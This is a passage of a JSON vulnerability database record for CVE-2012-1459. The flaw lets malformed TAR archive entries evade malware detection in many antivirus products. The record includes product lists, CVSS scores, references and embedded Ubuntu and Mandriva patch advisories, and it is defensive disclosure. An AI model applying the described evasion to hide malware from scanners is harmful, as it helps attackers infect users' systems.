1.0, "vendor": "trendmicro", "version": "9.120.0.1004" }, { "model": "quick heal", "scope": "eq", "trust": 1.0, "vendor": "cat", "version": "11.00" }, { "model": "f-prot antivirus", "scope": "eq", "trust": 1.0, "vendor": "f prot", "version": "4.6.2.117" }, { "model": "antivir", "scope": "eq", "trust": 1.0, "vendor": "avira", "version": "7.11.1.163" }, { "model": "anti-virus", "scope": "eq", "trust": 0.8, "vendor": "avast s r o", "version": "4.8.1351.0" }, { "model": "anti-virus", "scope": "eq", "trust": 0.8, "vendor": "avast s r o", "version": "5.0.677.0" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "avira", "version": "7.11.1.163" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "rising", "version": "22.83.00.03" }, { "model": "nod32 anti-virus", "scope": "eq", "trust": 0.8, "vendor": "eset", "version": "5795" }, { "model": "f-prot antivirus", "scope": "eq", "trust": 0.8, "vendor": "frisk", "version": "4.6.2.117" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "g data", "version": "21" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "k7 computing", "version": "9.77.3565" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "norman", "version": "6.06.12" }, { "model": "anti-virus", "scope": "eq", "trust": 0.8, "vendor": "nprotect", "version": "2011-01-17.01" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "panda security", "version": "10.0.2.7" }, { "model": "vba32", "scope": "eq", "trust": 0.8, "vendor": "virusblokada", "version": "3.12.14.2" }, { "model": "v3 internet security", "scope": "eq", "trust": 0.8, "vendor": "unlab", "version": "2011.01.18.00" }, { "model": "heal", "scope": "eq", "trust": 0.8, "vendor": "quick heal k k", "version": "11.00" }, { "model": "endpoint protection", "scope": "eq", "trust": 0.8, "vendor": "symantec", "version": "11" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "trend micro", "version": "9.120.0.1004" }, { "model": "housecall", "scope": "eq", "trust": 0.8, "vendor": "trend micro", "version": "9.120.0.1004" }, { "model": "security essentials", "scope": "eq", "trust": 0.8, "vendor": "microsoft", "version": "2.0 antimalware engine 1.1.6402.0" }, { "model": "web gateway software", "scope": "eq", "trust": 0.8, "vendor": "mcafee", "version": "2010.1c" }, { "model": "vba32", "scope": "eq", "trust": 0.3, "vendor": "virusblokada", "version": "3.12.142" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "virusbuster", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "13.6.1510" }, { "model": "trend micro", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "9.1201004" }, { "model": "housecall", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "9.1201004" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "symantec", "version": "20101.3103" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "12.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "rising", "version": "22.8303" }, { "model": "cat-quickheal", "scope": "eq", "trust": 0.3, "vendor": "quick heal", "version": "11.00" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "pctools", "version": "7.0.35" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "norman", "version": "6.6.12" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1.6402" }, { "model": "mcafee-gw-edition 2010.1c", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "kaspersky", "version": "7.0125" }, { "model": "computing pvt ltd k7antivirus", "scope": "eq", "trust": 0.3, "vendor": "k7", "version": "9.77.3565" }, { "model": "jiangmin", "scope": "eq", "trust": 0.3, "vendor": "jiangmin", "version": "13.0.900" }, { "model": "antivirus t3.1.1.97.0", "scope": null, "trust": 0.3, "vendor": "ikarus", "version": null }, { "model": "data software gdata", "scope": "eq", "trust": 0.3, "vendor": "g", "version": "21" }, { "model": "software f-prot antivirus", "scope": "eq", "trust": 0.3, "vendor": "frisk", "version": "4.6.2117" }, { "model": "nod32", "scope": "eq", "trust": 0.3, "vendor": "eset", "version": "5795" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "emsisoft", "version": "5.11" }, { "model": "anti-virus clamav", "scope": "eq", "trust": 0.3, "vendor": "clam", "version": "0.96.4" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "bitdefender", "version": "7.2" }, { "model": "antivir engine", "scope": "eq", "trust": 0.3, "vendor": "avira", "version": "7.11.1163" }, { "model": "anti-virus", "scope": "eq", "trust": 0.3, "vendor": "avg", "version": "10.01190" }, { "model": "avast5 antivirus", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "5.0.6770" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.8.1351.0" }, { "model": "command antivirus", "scope": "eq", "trust": 0.3, "vendor": "authentium", "version": "5.2.115" }, { "model": "antiy-avl", "scope": "eq", "trust": 0.3, "vendor": "antiy", "version": "2.0.37" }, { "model": "engine", "scope": "eq", "trust": 0.3, "vendor": "ahnlab", "version": "v32011.01.18.00" } ], "sources": [ { "db": "BID", "id": "52623" }, { "db": "JVNDB", "id": "JVNDB-2012-001869" }, { "db": "CNNVD", "id": "CNNVD-201203-422" }, { "db": "NVD", "id": "CVE-2012-1459" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:antiy:avl_sdk", "vulnerable": true }, { "cpe22Uri": "cpe:/a:authentium:command_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:avast:avast_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:avg:avg_anti-virus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:avira:antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:rising-global:rising_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:bitdefender:bitdefender", "vulnerable": true }, { "cpe22Uri": "cpe:/a:clamav:clamav", "vulnerable": true }, { "cpe22Uri": "cpe:/a:comodo:comodo_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:emsisoft:anti-malware", "vulnerable": true }, { "cpe22Uri": "cpe:/a:eset:nod32_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:f-prot:f-prot_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:gdata-software:g_data_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ikarus:ikarus_virus_utilities_t3_command_line_scanner", "vulnerable": true }, { "cpe22Uri": "cpe:/a:jiangmin:jiangmin_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:k7computing:antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:norman:norman_antivirus_%26_antispyware", "vulnerable": true }, { "cpe22Uri": "cpe:/a:nprotect:nprotect_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:pandasecurity:panda_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:pc_tools:pc_tools_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:anti-virus:vba32", "vulnerable": true }, { "cpe22Uri": "cpe:/a:virusbuster:virusbuster", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ahnlab:v3_internet_security", "vulnerable": true }, { "cpe22Uri": "cpe:/a:f-secure:anti-virus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:kaspersky:kaspersky_anti-virus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:quick_heal:quick_heal", "vulnerable": true }, { "cpe22Uri": "cpe:/a:symantec:endpoint_protection", "vulnerable": true }, { "cpe22Uri": "cpe:/a:sophos:anti-virus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:trendmicro:trend_micro_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:trendmicro:housecall", "vulnerable": true }, { "cpe22Uri": "cpe:/a:fortinet:fortinet_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:microsoft:security_essentials", "vulnerable": true }, { "cpe22Uri": "cpe:/a:mcafee:scan_engine", "vulnerable": true }, { "cpe22Uri": "cpe:/a:mcafee:web_gateway", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001869" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Suman Jana and Vitaly Shmatikov", "sources": [ { "db": "BID", "id": "52623" } ], "trust": 0.3 }, "cve": "CVE-2012-1459", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2012-1459", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-54740", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-1459", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2012-1459", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201203-422", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-54740", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-54740" }, { "db": "JVNDB", "id": "JVNDB-2012-001869" }, { "db": "CNNVD", "id": "CNNVD-201203-422" }, { "db": "NVD", "id": "CVE-2012-1459" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. Multiple products TAR A file parser contains a vulnerability that can prevent malware detection. Different TAR Parser If it is announced that there is also a problem with the implementation of CVE May be split.Corresponding to the length field of the full entry and part of the header of the next entry by a third party TAR Malware detection may be bypassed through archive entries. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bit2defender 7. ============================================================================\nUbuntu Security Notice USN-1482-2\nJune 20, 2012\n\nclamav regression\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 11.10\n- Ubuntu 11.04\n\nSummary:\n\nClamAV could improperly detect malware if it opened a specially crafted file. \n\nSoftware Description:\n- clamav: Anti-virus utility for Unix\n\nDetails:\n\nUSN-1482-1 fixed vulnerabilities in ClamAV. The updated packages could fail\nto install in certain situations. This update fixes the problem. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n It was discovered that ClamAV incorrectly handled certain malformed TAR\n archives. (CVE-2012-1457,\n CVE-2012-1459)\n \n It was discovered that ClamAV incorrectly handled certain malformed CHM\n files. A remote attacker could create a specially-crafted CHM file\n containing malware that could escape being detected. (CVE-2012-1458)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n clamav 0.97.5+dfsg-1ubuntu0.12.04.2\n clamav-daemon 0.97.5+dfsg-1ubuntu0.12.04.2\n libclamav6 0.97.5+dfsg-1ubuntu0.12.04.2\n\nUbuntu 11.10:\n clamav 0.97.5+dfsg-1ubuntu0.11.10.2\n clamav-daemon 0.97.5+dfsg-1ubuntu0.11.10.2\n libclamav6 0.97.5+dfsg-1ubuntu0.11.10.2\n\nUbuntu 11.04:\n clamav 0.97.5+dfsg-1ubuntu0.11.04.2\n clamav-daemon 0.97.5+dfsg-1ubuntu0.11.04.2\n libclamav6 0.97.5+dfsg-1ubuntu0.11.04.2\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-1482-2\n http://www.ubuntu.com/usn/usn-1482-1\n https://launchpad.net/bugs/1015337\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.2\n https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.2\n https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.2\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2012:094\n http://www.mandriva.com/security/\n _______________________________________________________________________\n\n Package : clamav\n Date : June 18, 2012\n Affected: Enterprise Server 5.0\n _______________________________________________________________________\n\n Problem Description:\n\n This is a bugfix release that upgrades clamav to the latest version\n (0.97.5) that resolves the following security issues:\n \n The TAR file parser in ClamAV 0.96.4 allows remote attackers to bypass\n malware detection via a TAR archive entry with a length field that\n exceeds the total TAR file size. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459\n http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n d82d78601290e2f6073974170c81841a mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm\n 80f0475472c0217afd3727019bf27e53 mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm\n c13835eadea8d2af15b628fba3159e8b mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm\n d7c058fae32f1a081b1d4ca31157df0e mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm\n 5ad153709c7eb510c2be2e82bfa5ac52 mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm\n 96e3d3f3e9bea802c4109c155c9d1465 mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm \n 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n b30f5aafd9aaff0a7743fb62f33ccbea mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 1508801239427c0ac72734f52cb4451c mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 92b4c5ca6db656801b5b6ae217c6e171 mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 94fad12df2cc900309087bbda13c826a mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 8ec166a457d0512479adaaf5f80d487f mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 19bc2758175bcde28ebf7783d68a9b98 mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm \n 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf\nOUr1QL5Wsvt3KboLKCdYUhE=\n=1QL7\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2012-1459" }, { "db": "JVNDB", "id": "JVNDB-2012-001869" }, { "db": "BID", "id": "52623" }, { "db": "VULHUB", "id": "VHN-54740" }, { "db": "PACKETSTORM", "id": "115619" }, { "db": "PACKETSTORM", "id": "113895" }, { "db": "PACKETSTORM", "id": "113878" }, { "db": "PACKETSTORM", "id": "113841" } ], "trust": 2.34 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-54740", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-54740" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-1459", "trust": 3.2 }, { "db": "BID", "id": "52623", "trust": 1.4 }, { "db": "OSVDB", "id": "80396", "trust": 1.1 }, { "db": "OSVDB", "id": "80389", "trust": 1.1 }, { "db": "OSVDB", "id": "80391", "trust": 1.1 }, { "db": "OSVDB", "id": "80403", "trust": 1.1 }, { "db": "OSVDB", "id": "80395", "trust": 1.1 }, { "db": "OSVDB", "id": "80390", "trust": 1.1 }, { "db": "OSVDB", "id": "80392", "trust": 1.1 }, { "db": "OSVDB", "id": "80393", "trust": 1.1 }, { "db": "OSVDB", "id": "80409", "trust": 1.1 }, { "db": "OSVDB", "id": "80406", "trust": 1.1 }, { "db": "OSVDB", "id": "80407", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2012-001869", "trust": 0.8 }, { "db": "BUGTRAQ", "id": "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS", "trust": 0.6 }, { "db": "NSFOCUS", "id": "19231", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201203-422", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "113878", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "115619", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "113895", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-54740", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "113841", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-54740" }, { "db": "BID", "id": "52623" }, { "db": "JVNDB", "id": "JVNDB-2012-001869" }, { "db": "PACKETSTORM", "id": "115619" }, { "db": "PACKETSTORM", "id": "113895" }, { "db": "PACKETSTORM", "id": "113878" }, { "db": "PACKETSTORM", "id": "113841" }, { "db": "CNNVD", "id": "CNNVD-201203-422" }, { "db": "NVD", "id": "CVE-2012-1459" } ] }, "id": "VAR-201203-0144", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-54740" } ], "trust": 0.01 }, "last_update_date": "2024-11-23T21:46:27.813000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "AVL SDK", "trust": 0.8, "url": "http://www.antiy.net/" }, { "title": "Command Antivirus", "trust": 0.8, "url": "http://www.authentium.com/command/CSAVDownload.html" }, { "title": "avast! Antivirus", "trust": 0.8, "url": "https://www.avast.co.jp/index" }, { "title": "AVG Anti-Virus", "trust": 0.8, "url": "http://www.avgjapan.com/home-small-office-security/buy-antivirus" }, { "title": "AntiVir", "trust": 0.8, "url": "http://www.avira.com/" }, { "title": "Rising Antivirus", "trust": 0.8, "url": "http://www.rising-global.com/" }, { "title": "Bitdefender", "trust": 0.8, "url": "http://www.bitdefender.com/" }, { "title": "ClamAV", "trust": 0.8, "url": "http://www.clamav.net/lang/en/" }, { "title": "Comodo Antivirus", "trust": 0.8, "url": "http://www.comodo.com/home/internet-security/antivirus.php" }, { "title": "Emsisoft Anti-Malware", "trust": 0.8, "url": "http://www.emsisoft.com/en/software/antimalware/" }, { "title": "ESET NOD32\u30a2\u30f3\u30c1\u30a6\u30a4\u30eb\u30b9", "trust": 0.8, "url": "http://www.eset.com/us/" }, { "title": "Fortinet Antivirus", "trust": 0.8, "url": "http://www.fortinet.com/solutions/antivirus.html" }, { "title": "F-Prot Antivirus", "trust": 0.8, "url": "http://www.f-prot.com/index.html" }, { "title": "G Data AntiVirus", "trust": 0.8, "url": "http://www.gdata.co.jp/" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.ikarus.at/en/" }, { "title": "Jiangmin Antivirus", "trust": 0.8, "url": "http://global.jiangmin.com/" }, { "title": "K7 AntiVirus", "trust": 0.8, "url": "http://www.k7computing.com/en/consumer_home.php" }, { "title": "McAfee Web Gateway", "trust": 0.8, "url": "http://www.mcafee.com/us/products/web-gateway.aspx" }, { "title": "McAfee Scan Engine", "trust": 0.8, "url": "http://www.mcafee.com/us/support/support-eol-scan-engine.aspx" }, { "title": "Norman Antivirus", "trust": 0.8, "url": "http://www.norman.com/products/antivirus_antispyware/en" }, { "title": "nProtect Anti-Virus", "trust": 0.8, "url": "http://global.nprotect.com/product/avs.php" }, { "title": "openSUSE-SU-2012:0833", "trust": 0.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html" }, { "title": "Panda Antivirus", "trust": 0.8, "url": "http://www.ps-japan.co.jp/" }, { "title": "PC Tools AntiVirus", "trust": 0.8, "url": "http://www.pctools.com/jp/spyware-doctor-antivirus/" }, { "title": "Quick Heal", "trust": 0.8, "url": "http://www.quickheal.com/" }, { "title": "Sophos Anti-Virus", "trust": 0.8, "url": "http://www.sophos.com/ja-jp/" }, { "title": "Endpoint Protection", "trust": 0.8, "url": "http://www.symantec.com/ja/jp/endpoint-protection" }, { "title": "Top Page", "trust": 0.8, "url": "http://jp.trendmicro.com/jp/home/index.html" }, { "title": "Trend Micro HouseCall", "trust": 0.8, "url": "http://jp.trendmicro.com/jp/tools/housecall/index.html" }, { "title": "VBA32", "trust": 0.8, "url": "http://anti-virus.by/en/index.shtml" }, { "title": "VirusBuster", "trust": 0.8, "url": "http://www.virusbuster.hu/en" }, { "title": "V3 Internet Security", "trust": 0.8, "url": "http://www.ahnlab.co.jp/product_service/product/b2b/v3is8.asp" }, { "title": "Kaspersky Anti-Virus", "trust": 0.8, "url": "http://www.kaspersky.com/kaspersky_anti-virus" }, { "title": "Microsoft Security Essentials", "trust": 0.8, "url": "http://windows.microsoft.com/ja-JP/windows/products/security-essentials" }, { "title": "F-Secure Anti-Virus", "trust": 0.8, "url": "http://www.f-secure.com/ja/web/home_jp/protection/anti-virus/overview" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001869" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-264", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-54740" }, { "db": "JVNDB", "id": "JVNDB-2012-001869" }, { "db": "NVD", "id": "CVE-2012-1459" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/522005" }, { "trust": 1.7, "url": "http://www.ieee-security.org/tc/sp2012/program.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52623" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:094" }, { "trust": 1.1, "url": "http://osvdb.org/80389" }, { "trust": 1.1, "url": "http://osvdb.org/80390" }, { "trust": 1.1, "url": "http://osvdb.org/80391" }, { "trust": 1.1, "url": "http://osvdb.org/80392" }, { "trust": 1.1, "url": "http://osvdb.org/80393" }, { "trust": 1.1, "url": "http://osvdb.org/80395" }, { "trust": 1.1, "url": "http://osvdb.org/80396" }, { "trust": 1.1, "url": "http://osvdb.org/80403" }, { "trust": 1.1, "url": "http://osvdb.org/80406" }, { "trust": 1.1, "url": "http://osvdb.org/80407" }, { "trust": 1.1, "url": "http://osvdb.org/80409" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1459" }, { "trust": 0.8, "url": 